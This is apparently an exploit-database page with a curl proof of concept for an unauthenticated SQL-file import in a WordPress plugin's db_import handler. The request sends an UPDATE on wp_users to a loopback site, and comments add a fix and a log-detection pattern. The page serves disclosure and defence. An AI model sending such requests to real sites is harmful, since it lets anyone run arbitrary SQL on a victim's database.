## https://sploitus.com/exploit?id=WPEX-ID:F0573253-9DD4-4C73-AA2E-867C9CAAE0DC
# PoC: Update the admin's display name
#
# Sends one multipart/form-data POST to /wp-admin/admin-post.php?action=db_import
# on a loopback instance (127.0.0.1:8000). The single form field,
# wp_advanced_search_file_import, carries a file named test.sql whose content
# is one UPDATE on wp_users that sets display_name for id = 1.
#
# Security-relevant point: the request as written has no Cookie or
# Authorization header and no nonce field. If the server applies the UPDATE,
# the db_import handler is running uploaded SQL without authenticating or
# authorizing the caller (the handler itself is not shown on this page).
#
# For defenders:
#   - Fix: the import handler should reject callers lacking an admin
#     capability (current_user_can()) and a valid nonce (check_admin_referer())
#     before it reads the upload; update or disable the affected plugin.
#   - Detection: in web server / WAF logs, POSTs to admin-post.php with
#     action=db_import and the multipart field wp_advanced_search_file_import
#     that arrive without a logged-in session cookie.
#
# curl flags: -i prints response headers, -s silences progress output,
# -k disables TLS certificate checks (no effect on this http:// URL).
# NOTE(review): Content-Length is hard-coded to 302 instead of being left for
# curl to compute from --data-binary; not verified against the body here.
curl -i -s -k -X $'POST' \
    -H $'Host: 127.0.0.1:8000' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: multipart/form-data; boundary=---------------------------484865952156175792666168121' -H $'Content-Length: 302' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
    --data-binary $'-----------------------------484865952156175792666168121\x0d\x0aContent-Disposition: form-data; name=\"wp_advanced_search_file_import\"; filename=\"test.sql\"\x0d\x0aContent-Type: application/sql\x0d\x0a\x0d\x0aupdate wp_users set display_name=\"Frycos\" where id = 1;\x0a\x0d\x0a-----------------------------484865952156175792666168121--\x0d\x0a' \
    $'http://127.0.0.1:8000/wp-admin/admin-post.php?action=db_import'